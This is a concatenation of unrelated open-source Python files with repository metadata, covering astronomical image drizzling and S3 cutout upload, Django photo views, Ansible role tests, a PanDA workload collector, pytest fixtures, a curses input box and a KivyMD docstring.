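# preserves the sky footprint; the extra -0.5 on CRPIX keeps pixel centers
# aligned under the FITS 1-indexed pixel convention.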
for k in ['NAXIS1','NAXIS2','CRPIX1','CRPIX2']:
h[k] *= 2
h['CRPIX1'] -= 0.5
h['CRPIX2'] -= 0.5
for k in ['CD1_1', 'CD1_2', 'CD2_1', 'CD2_2']:
if k in h:
h[k] /= 2
#data = np.zeros((h['NAXIS2'], h['NAXIS1']), dtype=np.int16)
#pyfits.PrimaryHDU(header=h, data=data).writeto('ref.fits', overwrite=True, output_verify='fix')
#visits[0]['reference'] = 'ref.fits'
print('\n\n###\nMake filter: {0}'.format(filt))
if (filt.upper() in ['F105W','F125W','F140W','F160W']) & include_ir_psf:
clean_i = False
else:
clean_i = remove
status = utils.drizzle_from_visit(visits[0], h, pixfrac=pixfrac, kernel=kernel, clean=clean_i, include_saturated=include_saturated)
if status is not None:
sci, wht, outh = status
if subtract_median:
#med = np.median(sci[sci != 0])
try:
un_data = np.unique(sci[(sci != 0) & np.isfinite(sci)])
med = utils.mode_statistic(un_data)
except:
med = 0.
if not np.isfinite(med):
med = 0.
print('\n\nMedian {0} = {1:.3f}\n\n'.format(filt, med))
outh['IMGMED'] = (med, 'Median subtracted from the image')
else:
med = 0.
outh['IMGMED'] = (0., 'Median subtracted from the image')
pyfits.writeto('{0}-{1}_drz_sci.fits'.format(label, filt),
data=sci, header=outh, overwrite=True,
output_verify='fix')
pyfits.writeto('{0}-{1}_drz_wht.fits'.format(label, filt),
data=wht, header=outh, overwrite=True,
output_verify='fix')
has_filts.append(filt)
if (filt.upper() in ['F105W','F125W','F140W','F160W']) & include_ir_psf:
from grizli.galfit.psf import DrizzlePSF
hdu = pyfits.open('{0}-{1}_drz_sci.fits'.format(label, filt),
mode='update')
flt_files = [] #visits[0]['files']
for i in range(1, 10000):
key = 'FLT{0:05d}'.format(i)
if key not in hdu[0].header:
break
flt_files.append(hdu[0].header[key])
dp = DrizzlePSF(flt_files=flt_files, driz_hdu=hdu[0])
psf = dp.get_psf(ra=dp.driz_wcs.wcs.crval[0],
dec=dp.driz_wcs.wcs.crval[1],
filter=filt.upper(),
pixfrac=dp.driz_header['PIXFRAC'],
kernel=dp.driz_header['KERNEL'],
wcs_slice=dp.driz_wcs, get_extended=True,
verbose=False, get_weight=False)
psf[1].header['EXTNAME'] = 'PSF'
#psf[1].header['EXTVER'] = filt
hdu.append(psf[1])
hdu.flush()
if remove:
os.system('rm *_fl*fits')
if combine_similar_filters:
combine_filters(label=label)
if len(has_filts) == 0:
return []
if rgb_params:
#auto_script.field_rgb(root=label, HOME_PATH=None, filters=has_filts, **rgb_params)
show_all_thumbnails(label=label, thumb_height=thumb_height, scale_ab=scale_ab, close=True, rgb_params=rgb_params, filters=show_filters)
if (single_output != 0):
# Concatenate into a single FITS file
files = glob.glob('{0}-f*_dr[cz]_sci.fits'.format(label))
files.sort()
if combine_similar_filters:
comb_files = glob.glob('{0}-[a-eg-z]*_dr[cz]_sci.fits'.format(label))
comb_files.sort()
files += comb_files
hdul = None
for file in files:
hdu_i = pyfits.open(file)
hdu_i[0].header['EXTNAME'] = 'SCI'
if 'NCOMBINE' in hdu_i[0].header:
if hdu_i[0].header['NCOMBINE'] <= single_output:
continue
filt_i = file.split('-')[-1].split('_dr')[0]
else:
filt_i = utils.get_hst_filter(hdu_i[0].header)
for h in hdu_i:
h.header['EXTVER'] = filt_i
if hdul is None:
hdul = pyfits.HDUList([h])
else:
hdul.append(h)
print('Add to {0}.thumb.fits: {1}'.format(label, file))
# Weight
hdu_i = pyfits.open(file.replace('_sci', '_wht'))
hdu_i[0].header['EXTNAME'] = 'WHT'
for h in hdu_i:
h.header['EXTVER'] = filt_i
if hdul is None:
hdul = pyfits.HDUList([h])
else:
hdul.append(h)
hdul.writeto('{0}.thumb.fits'.format(label), overwrite=True,
output_verify='fix')
for file in files:
for f in [file, file.replace('_sci','_wht')]:
if os.path.exists(f):
print('Remove {0}'.format(f))
os.remove(f)
# Segmentation figure
thumb_file = '{0}.thumb.fits'.format(label)
if (make_segmentation_figure) & (os.path.exists(thumb_file)) & (aws_prep_dir is not None):
print('Make segmentation figure')
# Fetch segmentation image and catalog
s3_prep_path = 'Pipeline/{0}/Prep/'.format(prep_root)
s3_full_path = '{0}/{1}'.format(prep_bucket, s3_prep_path)
s3_file = '{0}_visits.npy'.format(prep_root)
has_seg_files = True
seg_files = ['{0}-ir_seg.fits.gz'.format(prep_root),
'{0}_phot.fits'.format(prep_root)]
for s3_file in seg_files:
if not os.path.exists(s3_file):
remote_file = os.path.join(s3_prep_path, s3_file)
try:
print('Fetch {0}'.format(remote_file))
prep_bkt.download_file(remote_file, s3_file,
ExtraArgs={"RequestPayer": "requester"})
except:
has_seg_files = False
print('Make segmentation figure failed: {0}'.format(remote_file))
break
if has_seg_files:
s3_cat = utils.read_catalog(seg_files[1])
segmentation_figure(label, s3_cat, seg_files[0])
if aws_bucket:
#aws_bucket = 's3://grizli-cosmos/CutoutProducts/'
#aws_bucket = 's3://grizli/CutoutProducts/'
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
bkt = s3.Bucket(aws_bucket.split("/")[2])
aws_path = '/'.join(aws_bucket.split("/")[3:])
if sync_fits:
files = glob.glob('{0}*'.format(label))
else:
files = glob.glob('{0}*png'.format(label))
for file in files:
print('{0} -> {1}'.format(file, aws_bucket))
bkt.upload_file(file, '{0}/{1}'.format(aws_path, file).replace('//','/'), ExtraArgs={'ACL': 'public-read'})
#os.system('aws s3 sync --exclude "*" --include "{0}*" ./ {1} --acl public-read'.format(label, aws_bucket))
#os.system("""echo "<pre>" > index.html; aws s3 ls AWSBUCKETX --human-readable | sort -k 1 -k 2 | grep -v index | awk '{printf("%s %s",$1, $2); printf(" %6s %s ", $3, $4); print "<a href="$5">"$5"</a>"}'>> index.html; aws s3 cp index.html AWSBUCKETX --acl public-read""".replace('AWSBUCKETX', aws_bucket))
return has_filts
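# --- Usage sketch (values taken from the docstring example above; passing
# aws_bucket=None keeps all products local, which the code path above supports) ---
#
#   drizzle_images(label='cp561356', ra=150.208875, dec=1.850241667, size=40,
#                  filters=['f160w', 'f814w'], aws_bucket=None, master='grizli-jan2019')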
def get_cutout_from_aws(label='macs0647-jd1', ra=101.9822125, dec=70.24326667, master='grizli-jan2019', scale_ab=21, thumb_height=2.0, remove=1, aws_bucket="s3://grizli/DropoutThumbnails/", lambda_func='grizliImagingCutout', force=False, **kwargs):
"""
Get cutout using AWS lambda
"""
import boto3
import json
#func = 'grizliImagingCutout'
#label = '{0}_{1:05d}'.format(self.cat['root'][ix], self.cat['id'][ix])
#url = 'https://s3.amazonaws.com/grizli/DropoutThumbnails/{0}.thumb.png'
session = boto3.Session()
client = session.client('lambda', region_name='us-east-1')
event = {
'label': label,
"ra": ra,
"dec": dec,
"scale_ab": scale_ab,
"thumb_height": thumb_height,
"aws_bucket":aws_bucket,
"remove":remove,
"master":master,
}
for k in kwargs:
event[k] = kwargs[k]
bucket_split = aws_bucket.strip("s3://").split('/')
bucket_name = bucket_split[0]
bucket_path = '/'.join(bucket_split[1:])
s3 = boto3.resource('s3')
s3_client = boto3.client('s3')
bkt = s3.Bucket(bucket_name)
files = [obj.key for obj in bkt.objects.filter(Prefix='{0}/{1}.thumb.png'.format(bucket_path, label))]
if (len(files) == 0) | force:
print('Call lambda: {0}'.format(label))
print(event)
response = client.invoke(
FunctionName=lambda_func,
InvocationType='Event',
LogType='Tail',
Payload=json.dumps(event))
else:
response = None
print('Thumb exists')
return response
def handler(event, context):
import os
import grizli
print(grizli.__version__)
os.chdir('/tmp/')
os.system('rm *')
os.system('rm -rf matplotlib*')
print(event) #['s3_object_path'], event['verbose'])
drizzle_images(**event)
os.system('rm *')
def combine_filters(label='j022708p4901_00273', verbose=True):
"""
Group nearby filters
"""
import glob
import numpy as np
import astropy.io.fits as pyfits
from grizli import utils
filter_queries = {}
filter_queries['uv'] = '{0}-f[2-3]*sci.fits'.format(label)
filter_queries['visb'] = '{0}-f[4-5]*sci.fits'.format(label)
filter_queries['visr'] = '{0}-f[6-8]*sci.fits'.format(label)
filter_queries['y'] = '{0}-f[01][90][85]*sci.fits'.format(label)
filter_queries['j'] = '{0}-f1[12][05]*sci.fits'.format(label)
filter_queries['h'] = '{0}-f1[64]0*sci.fits'.format(label)
grouped_filters = {}
for qfilt in filter_queries:
drz_files = glob.glob(filter_queries[qfilt])
drz_files.sort()
grouped_filters[qfilt] = [f.split('_dr')[0].split('-')[-1] for f in drz_files]
if len(drz_files) > 0:
drz_files.sort()
if verbose:
print('# Combine filters, {0}={1}'.format(qfilt,
'+'.join(drz_files)))
for i, file in enumerate(drz_files[::-1]):
drz = pyfits.open(file)
wht = pyfits.open(file.replace('_sci','_wht'))
sci = drz[0].data*1.
# Subtract background?
if 'IMGMED' in drz[0].header:
sci -= drz[0].header['IMGMED']
drz[0].header['IMGMED'] = 0.
if i == 0:
photflam = drz[0].header['PHOTFLAM']
num = sci*wht[0].data
den = wht[0].data
drz_ref = drz
drz_ref[0].header['CFILT{0}'.format(i+1)] = utils.get_hst_filter(drz[0].header)
drz_ref[0].header['NCOMBINE'] = (len(drz_files), 'Number of combined filters')
else:
scl = drz[0].header['PHOTFLAM']/photflam
num += sci*scl*(wht[0].data/scl**2)
den += wht[0].data/scl**2
drz_ref[0].header['CFILT{0}'.format(i+1)] = utils.get_hst_filter(drz[0].header)
drz_ref[0].header['NDRIZIM'] += drz[0].header['NDRIZIM']
sci = num/den
sci[den == 0] = 0
drz_ref[0].data = sci
pyfits.writeto('{0}-{1}_drz_sci.fits'.format(label, qfilt),
data=sci, header=drz_ref[0].header, overwrite=True,
output_verify='fix')
pyfits.writeto('{0}-{1}_drz_wht.fits'.format(label, qfilt),
data=den, header=drz_ref[0].header, overwrite=True,
output_verify='fix')
return grouped_filters
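# Note on the weighting above (explanatory, not original code): frames are
# combined in the count-rate system of the first file read, rescaling each by
# scl = PHOTFLAM_i / PHOTFLAM_ref so fluxes match, and dividing its weight map
# by scl**2 because scaling data by s scales its variance by s**2. E.g. with
# scl = 2: num += (sci*2)*(wht/4) and den += wht/4, which keeps the
# inverse-variance weights consistent.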
def show_all_thumbnails(label='j022708p4901_00273', filters=['visb', 'visr', 'y', 'j', 'h'], scale_ab=21, close=True, thumb_height=2., rgb_params=RGB_PARAMS):
"""
Show individual filter and RGB thumbnails
"""
import glob
#from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
import astropy.io.fits as pyfits
from astropy.visualization import make_lupton_rgb
from grizli.pipeline import auto_script
from grizli import utils
all_files = glob.glob('{0}-f*sci.fits'.format(label))
all_filters = [f.split('_dr')[0].split('-')[-1] for f in all_files]
ims = {}
for filter in filters:
drz_files = glob.glob('{0}-{1}*_dr*sci.fits'.format(label, filter))
if len(drz_files) > 0:
im = pyfits.open(drz_files[0])
ims[filter] = im
rgb_params['scale_ab'] = scale_ab
slx, sly, rgb_filts, fig = auto_script.field_rgb(root=label, HOME_PATH=None, **rgb_params) #xsize=4, output_dpi=None, HOME_PATH=None, show_ir=False, pl=1, pf=1, scl=1, rgb_scl=[1, 1, 1], ds9=None, force_ir=False, filters=all_filters, add_labels=False, output_format='png', rgb_min=-0.01, xyslice=None, pure_sort=False, verbose=True, force_rgb=None, suffix='.rgb', scale_ab=scale_ab)
if close:
plt.close()
#rgb = np.array(Image.open('{0}.rgb.png'.format(label)))
rgb = plt.imread('{0}.rgb.png'.format(label))
NX = (len(filters)+1)
fig = plt.figure(figsize=[thumb_height*NX, thumb_height])
ax = fig.add_subplot(1,NX,NX)
ax.imshow(rgb, origin='upper', interpolation='nearest')
# ax.text(0.05, 0.95, label, ha='left', va='top', transform=ax.transAxes, fontsize=7, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
# ax.text(0.05, 0.05, ' '.join(rgb_filts), ha='left', va='bottom', transform=ax.transAxes, fontsize=6, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
for i, filter in enumerate(filters):
if filter in ims:
zp_i = utils.calc_header_zeropoint(ims[filter], ext=0)
scl = 10**(-0.4*(zp_i-5-scale_ab))
pixscl = utils.get_wcs_pscale(ims[filter][0].header.copy())
scl *= (0.06/pixscl)**2
img = ims[filter][0].data*scl
image = make_lupton_rgb(img, img, img, stretch=0.1, minimum=-0.01)
ax = fig.add_subplot(1,NX,i+1)
ax.imshow(255-image, origin='lower', interpolation='nearest')
for ax in fig.axes:
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_xticks([])
ax.set_yticks([])
fig.tight_layout(pad=0.1)
# Add labels
xl, yl = 0.04, 0.98
for i, filter in enumerate(filters):
if filter in ims:
if filter in ['uv', 'visb', 'visr', 'y', 'j', 'h']:
grouped_filters = []
h_i = ims[filter][0].header
for j in range(h_i['NCOMBINE']):
grouped_filters.append(h_i['CFILT{0}'.format(j+1)])
text_label = '+'.join(grouped_filters)
else:
text_label = filter
fig.text((i+xl)/NX, yl, text_label, fontsize=7,
ha='left', va='top', transform=fig.transFigure,
bbox=dict(facecolor='w', edgecolor='None', alpha=0.9))
#
fig.text((i+1+xl)/NX, yl, label, ha='left', va='top', transform=fig.transFigure, fontsize=7, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
fig.text((i+1+xl)/NX, 1-yl, ' '.join(rgb_filts), ha='left', va='bottom', transform=fig.transFigure, fontsize=6, color='w', bbox=dict(facecolor='k', edgecolor='None', alpha=0.8))
fig.savefig('{0}.thumb.png'.format(label))
if close:
plt.close()
if __name__ == "__main__":
import sys
if len(sys.argv) < 5:
print('Usage: aws_drizzler.py cp561356 150.208875 1.850241667 40 ')
print(sys.argv)
exit()
#print('xxx')
drizzle_images(label=sys.argv[1], ra=float(sys.argv[2]), dec=float(sys.argv[3]), size=float(sys.argv[4]))
def go():
"""
grep -v "\#" QGs.txt | awk '{print "./aws_drizzler.py",$1,$2,$3,"60"}' > run.sh
grep -v "\#" gomez.txt | awk '{print "./aws_drizzler.py",$1,$2,$3,"60"}' >> run.sh
"""
pass
| 38.637243
| 714
| 0.523175
|
4a189c37b0412d8e20e8f4c84b1613a7b0de5154
| 1,381
|
py
|
Python
|
photos/views.py
|
DennisKipkirui/Tribune
|
701b6e0c2f12c6789cf1722d5fc81362f61b2a05
|
[
"MIT"
] | null | null | null |
photos/views.py
|
DennisKipkirui/Tribune
|
701b6e0c2f12c6789cf1722d5fc81362f61b2a05
|
[
"MIT"
] | null | null | null |
photos/views.py
|
DennisKipkirui/Tribune
|
701b6e0c2f12c6789cf1722d5fc81362f61b2a05
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
from .models import Image, Location, Category
# Create your views here.
def welcome(request):
images = Image.get_all_images()
locations = Location.get_all_locations()
return render(request, 'welcome.html', {'images': images, 'locations': locations})
def search_results(request):
if 'category' in request.GET and request.GET["category"]:
search_term = request.GET.get("category")
searched_images = Image.search_by_category(search_term)
message = f"{search_term}"
return render(request,'search.html',{"message":message, "images":searched_images, "category":search_term})
else:
message = "You haven't searched for any category"
return render(request, 'search.html', {"message":message})
# def location(request,location):
# selected_location = Location.objects.get(id = location)
# images = Image.objects.filter(location = selected_location.id)
# return render(request, 'location.html', {"location":selected_location,"images":images})
def filter_by_location(request,location_id):
"""
Function that filters images by location
"""
images = Image.filter_location(id=location_id)
print(location_id, 'it works')
return render(request, 'location.html', {"images":images})
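# --- Hypothetical model helper (hedged sketch; the real Image.filter_location
# lives in photos/models.py and is not shown here) ---
#
#   @classmethod
#   def filter_location(cls, id):
#       return cls.objects.filter(location_id=id)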
| 32.116279
| 114
| 0.687907
|
4a189c6574bf47c9ebb77c87ea855756c0433ba4
| 1,086
|
py
|
Python
|
molecule/default/tests/test_default.py
|
mongodb-ansible-roles/ansible-role-icecc
|
d4e0c3c3644a9d5eae225ea517d9081ac5c357a9
|
[
"Apache-2.0"
] | null | null | null |
molecule/default/tests/test_default.py
|
mongodb-ansible-roles/ansible-role-icecc
|
d4e0c3c3644a9d5eae225ea517d9081ac5c357a9
|
[
"Apache-2.0"
] | 1
|
2020-03-24T13:55:19.000Z
|
2020-03-24T13:55:19.000Z
|
molecule/default/tests/test_default.py
|
mongodb-ansible-roles/ansible-role-icecc
|
d4e0c3c3644a9d5eae225ea517d9081ac5c357a9
|
[
"Apache-2.0"
] | null | null | null |
import os
import testinfra.utils.ansible_runner
testinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(
os.environ['MOLECULE_INVENTORY_FILE']
).get_hosts('all')
def test_host(host):
assert host.file("/etc/hosts").exists
def test_icecc_is_installed(host):
icecc = host.package("icecc")
assert icecc.is_installed
def test_icecc_conf_file(host):
icecc_conf_file = '/etc/icecc/icecc.conf'
assert host.file(icecc_conf_file).exists
assert host.file(icecc_conf_file).is_file
content = host.file(icecc_conf_file).content_string
icecc_scheduler_config = \
'ICECC_SCHEDULER_HOST="iceccd-scheduler-lb-placholder.amazonaws.com"'
assert icecc_scheduler_config in content
def test_icecc_systemd_override(host):
icecc_systemd_override_file = \
'/etc/systemd/system/iceccd.service.d/override.conf'
assert host.file(icecc_systemd_override_file).exists
assert host.file(icecc_systemd_override_file).is_file
content = host.file(icecc_systemd_override_file).content_string
assert 'Restart=on-failure' in content
| 30.166667
| 77
| 0.770718
|
4a189c9b7c2d04d65749836cff66716d19918616
| 3,565
|
py
|
Python
|
lib/rucio/daemons/c3po/collectors/workload.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | 1
|
2017-08-07T13:34:55.000Z
|
2017-08-07T13:34:55.000Z
|
lib/rucio/daemons/c3po/collectors/workload.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | null | null | null |
lib/rucio/daemons/c3po/collectors/workload.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | 1
|
2021-06-17T14:15:15.000Z
|
2021-06-17T14:15:15.000Z
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Thomas Beermann, <thomas.beermann@cern.ch>, 2015-2017
"""
C3PO PanDA workload collector
"""
import logging
from json import loads
from time import time
from requests import get
from rucio.common.config import config_get, config_get_int
from rucio.daemons.c3po.utils.timeseries import RedisTimeSeries
class WorkloadCollector(object):
"""
Collector to retrieve the workload from PanDA. It stores it as a time series in Redis and provides
the average and maximum number of running jobs for a sliding window.
"""
class __WorkloadCollector(object):
"""
Private class needed implement singleton.
"""
def __init__(self, delete_keys=False):
self._avg_jobs = {}
self._cur_jobs = {}
self._max_jobs = {}
self._tms = RedisTimeSeries(config_get('c3po', 'redis_host'), config_get_int('c3po', 'redis_port'), config_get_int('c3po-workload', 'window'), 'jobs_')
self._request_headers = {"Accept": "application/json", "Content-Type": "application/json"}
self._request_url = config_get('c3po-workload', 'panda_url')
if delete_keys:
self._tms.delete_keys()
self.reload_cache()
def reload_cache(self):
self._tms.trim()
for key in self._tms.get_keys():
site = "_".join(key.split('_')[1:])
job_series = self._tms.get_series(site)
num_jobs = len(job_series)
if num_jobs > 0:
self._avg_jobs[site] = sum(job_series) / num_jobs
self._max_jobs[site] = max(job_series)
self._cur_jobs[site] = job_series[-1]
def collect_workload(self):
start = time()
resp = get(self._request_url, headers=self._request_headers)
logging.debug("PanDA response took %fs" % (time() - start))
start = time()
jobs = loads(resp.text)['jobs']
logging.debug("decoding JSON response took %fs" % (time() - start))
sites = {}
start = time()
for job in jobs:
if job['computingsite'] not in sites:
sites[job['computingsite']] = 0
sites[job['computingsite']] += 1
            for site, count in sites.items():
                self._tms.add_point(site, count)
logging.debug("processing took %fs" % (time() - start))
self.reload_cache()
instance = None
def __init__(self):
if not WorkloadCollector.instance:
WorkloadCollector.instance = WorkloadCollector.__WorkloadCollector()
def get_avg_jobs(self, site):
return self.instance._avg_jobs[site]
def get_max_jobs(self, site):
return self.instance._max_jobs[site]
def get_cur_jobs(self, site):
return self.instance._cur_jobs[site]
def get_sites(self):
return self.instance._avg_jobs.keys()
def get_job_info(self, site):
return (self.get_cur_jobs(site), self.get_avg_jobs(site), self.get_max_jobs(site))
def get_series(self, site):
return self.instance._tms.get_series(site)
def collect_workload(self):
self.instance.collect_workload()
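A minimal usage sketch for the collector above. This assumes a reachable Redis instance, populated [c3po]/[c3po-workload] config sections and a valid PanDA URL; the site names printed are whatever PanDA reports.

from rucio.daemons.c3po.collectors.workload import WorkloadCollector

collector = WorkloadCollector()      # all instances share the singleton state
collector.collect_workload()         # one poll of the PanDA job dump
for site in collector.get_sites():
    cur, avg, top = collector.get_job_info(site)
    print(site, cur, avg, top)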
| 33.632075
| 163
| 0.61655
|
4a189d43f357c0cb120ed3f9b159e657da9bd814
| 991
|
py
|
Python
|
tests/conftest.py
|
oisindoherty3/drem
|
478fe4e72fd38628f4ddc3745c16efe75ee98e4d
|
[
"MIT"
] | 4
|
2020-07-21T12:18:53.000Z
|
2020-11-19T12:30:56.000Z
|
tests/conftest.py
|
oisindoherty3/drem
|
478fe4e72fd38628f4ddc3745c16efe75ee98e4d
|
[
"MIT"
] | 101
|
2020-08-20T16:29:44.000Z
|
2021-01-13T12:41:53.000Z
|
tests/conftest.py
|
oisindoherty3/drem
|
478fe4e72fd38628f4ddc3745c16efe75ee98e4d
|
[
"MIT"
] | 5
|
2020-07-31T11:51:30.000Z
|
2020-10-14T10:25:39.000Z
|
# flake8: noqa
import logging
import pytest
from _pytest.logging import caplog as _caplog
from _pytest.monkeypatch import MonkeyPatch
from loguru import logger
@pytest.fixture(autouse=True)
def no_http_requests(monkeypatch):
"""Prevent any test from making HTTP requests.
Source: https://blog.jerrycodes.com/no-http-requests/
Args:
        monkeypatch (MonkeyPatch): pytest fixture used to patch urllib3 for the duration of each test.
"""
def urlopen_mock(self, method, url, *args, **kwargs):
raise RuntimeError(
f"The test was about to {method} {self.scheme}://{self.host}{url}",
)
monkeypatch.setattr(
"urllib3.connectionpool.HTTPConnectionPool.urlopen", urlopen_mock,
)
@pytest.fixture
def caplog(_caplog):
    class PropagateHandler(logging.Handler):
        def emit(self, record):
            logging.getLogger(record.name).handle(record)
    handler_id = logger.add(PropagateHandler(), format="{message} {extra}")
yield _caplog
logger.remove(handler_id)
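A sketch of a test exercising the autouse fixture above; since it patches urllib3's connection pool, any library built on urllib3 (here `requests`, assumed installed) is intercepted before a socket is opened.

import pytest
import requests


def test_http_is_blocked():
    # The autouse no_http_requests fixture turns the attempt into RuntimeError.
    with pytest.raises(RuntimeError, match="about to GET"):
        requests.get("http://example.com")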
| 24.170732
| 79
| 0.69223
|
4a189d465eeb521e45ad7d80bc2777823c912d8b
| 61
|
py
|
Python
|
lectures/5_Image_Analysis/line_extraction.py
|
jagar2/Summer_2020_MAT-395-495_Scientific-Data-Analysis-and-Computing
|
e4b831460bddd34e7ad1d8888327c8d85b80e35e
|
[
"BSD-3-Clause"
] | 1
|
2021-11-10T15:34:37.000Z
|
2021-11-10T15:34:37.000Z
|
lectures/5_Image_Analysis/line_extraction.py
|
jagar2/Summer_2020_MAT-395-495_Scientific-Data-Analysis-and-Computing
|
e4b831460bddd34e7ad1d8888327c8d85b80e35e
|
[
"BSD-3-Clause"
] | null | null | null |
lectures/5_Image_Analysis/line_extraction.py
|
jagar2/Summer_2020_MAT-395-495_Scientific-Data-Analysis-and-Computing
|
e4b831460bddd34e7ad1d8888327c8d85b80e35e
|
[
"BSD-3-Clause"
] | 3
|
2020-08-06T15:11:50.000Z
|
2022-01-05T20:21:09.000Z
|
import matplotlib.pyplot as plt  # needed for plt.plot; `kernel` is assumed to be a 2-D numpy array
profile = kernel[:, kernel.shape[1] // 2]  # middle column = 1-D cross-section of the kernel
plt.plot(profile)
| 15.25
| 41
| 0.655738
|
4a189dd89938ebff3f667f7d1dc0f74475d5e2b1
| 1,444
|
py
|
Python
|
util/util.py
|
nelson870708/PerceptualSimilarity
|
c46cc10ea108403d2c42925e1417617912efd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
util/util.py
|
nelson870708/PerceptualSimilarity
|
c46cc10ea108403d2c42925e1417617912efd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
util/util.py
|
nelson870708/PerceptualSimilarity
|
c46cc10ea108403d2c42925e1417617912efd4d8
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
from PIL import Image
def load_image(path):
if path[-3:] == "dng":
import rawpy
with rawpy.imread(path) as raw:
img = raw.postprocess()
elif path[-3:] == "bmp" or path[-3:] == "jpg" or path[-3:] == "png":
import cv2
return cv2.imread(path)[:, :, ::-1]
else:
img = (255 * plt.imread(path)[:, :, :3]).astype("uint8")
return img
def save_image(
image_numpy, image_path,
):
image_pil = Image.fromarray(image_numpy)
image_pil.save(image_path)
def mkdirs(paths):
if isinstance(paths, list) and not isinstance(paths, str):
for path in paths:
mkdir(path)
else:
mkdir(paths)
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def tensor2im(image_tensor, imtype=np.uint8, cent=1.0, factor=255.0 / 2.0):
# def tensor2im(image_tensor, imtype=np.uint8, cent=1., factor=1.):
image_numpy = image_tensor[0].cpu().float().numpy()
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + cent) * factor
return image_numpy.astype(imtype)
def im2tensor(image, imtype=np.uint8, cent=1.0, factor=255.0 / 2.0):
# def im2tensor(image, imtype=np.uint8, cent=1., factor=1.):
return torch.Tensor(
(image / factor - cent)[:, :, :, np.newaxis].transpose((3, 2, 0, 1))
)
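A round-trip sanity sketch for im2tensor/tensor2im using a random in-memory image (no file needed); individual pixel values may differ by one after the float round trip, so only the shape is asserted.

import numpy as np

img = np.random.randint(0, 256, size=(32, 32, 3), dtype=np.uint8)
t = im2tensor(img)        # -> torch tensor of shape (1, 3, 32, 32) in [-1, 1]
back = tensor2im(t)       # -> HWC uint8 array again
assert back.shape == img.shape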
| 24.474576
| 76
| 0.617036
|
4a189e62e3f36a6f1111eed1d5158f05e8b619cc
| 1,647
|
py
|
Python
|
spotui/src/input.py
|
octoshrimpy/spotui
|
b0d195d1cdc803839e8421472ed897521c6124d4
|
[
"MIT"
] | 2
|
2021-06-10T22:30:41.000Z
|
2021-06-13T21:20:50.000Z
|
spotui/src/input.py
|
octoshrimpy/spotui
|
b0d195d1cdc803839e8421472ed897521c6124d4
|
[
"MIT"
] | null | null | null |
spotui/src/input.py
|
octoshrimpy/spotui
|
b0d195d1cdc803839e8421472ed897521c6124d4
|
[
"MIT"
] | null | null | null |
import curses
import time
import locale
from curses import textpad
locale.setlocale(locale.LC_ALL, "")
code = locale.getpreferredencoding()
class Input:
def __init__(self,
stdscr,
starty=0,
startx=0,
endy=0,
endx=0,
handle_submit=None):
self.stdscr = stdscr
self.handle_submit = handle_submit
self.starty = starty + 2
self.startx = startx + 2
self.endy = endy - 1
self.endx = endx - 2
self.active = True
scry, scrx = self.stdscr.getmaxyx()
self.available_space = self.endx - self.startx
def render(self, status=None):
win = curses.newwin(2, self.available_space - 2, self.starty,
self.startx)
box = textpad.Textbox(win, insert_mode=True)
curses.echo()
curses.nocbreak()
self.stdscr.refresh()
contents = box.edit(self.__enter_is_terminate)
win.clrtoeol()
del win
self.handle_submit(contents)
curses.noecho()
curses.cbreak()
def receive_input(self, key):
pass
    # By this point the Textbox is already consuming input, so it is too late to intercept Esc here and close the widget.
def __enter_is_terminate(self, x):
if x == 10 or x == 13 or x == curses.KEY_ENTER:
self.stdscr.clear()
return 7
def __printString(self, y, x, text, color):
if color:
self.stdscr.attron(curses.color_pair(color))
self.stdscr.addstr(y, x, text)
if color:
self.stdscr.attroff(curses.color_pair(color))
| 28.894737
| 81
| 0.567699
|
4a18a02641457d32ec9c31e596d3cfbbaf632855
| 299
|
py
|
Python
|
tests/test_skeleton.py
|
RichWolff/hackathon_supply_chain
|
0d51e0dbb652954d9b18e6aaf51e6968ba769d6a
|
[
"MIT"
] | null | null | null |
tests/test_skeleton.py
|
RichWolff/hackathon_supply_chain
|
0d51e0dbb652954d9b18e6aaf51e6968ba769d6a
|
[
"MIT"
] | null | null | null |
tests/test_skeleton.py
|
RichWolff/hackathon_supply_chain
|
0d51e0dbb652954d9b18e6aaf51e6968ba769d6a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pytest
from id2020.skeleton import fib
__author__ = "Richard Wolff"
__copyright__ = "Richard Wolff"
__license__ = "mit"
def test_fib():
assert fib(1) == 1
assert fib(2) == 1
assert fib(7) == 13
with pytest.raises(AssertionError):
fib(-10)
| 16.611111
| 39
| 0.635452
|
4a18a186dc12f92d6b6ff7c7a528a2a4c22c80a4
| 37,219
|
py
|
Python
|
kivymd/uix/picker.py
|
zarari23/KivyMD
|
3274d622abc0986c82719393a357b6a745e061f2
|
[
"MIT"
] | null | null | null |
kivymd/uix/picker.py
|
zarari23/KivyMD
|
3274d622abc0986c82719393a357b6a745e061f2
|
[
"MIT"
] | null | null | null |
kivymd/uix/picker.py
|
zarari23/KivyMD
|
3274d622abc0986c82719393a357b6a745e061f2
|
[
"MIT"
] | null | null | null |
"""
Components/Pickers
==================
Includes date, time and theme pickers
`KivyMD` provides the following classes for use:
- MDTimePicker_
- MDDatePicker_
- MDThemePicker_
.. _MDTimePicker:
MDTimePicker
------------
.. rubric:: Usage
.. code-block:: python
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.picker import MDTimePicker
KV = '''
FloatLayout:
MDRaisedButton:
text: "Open time picker"
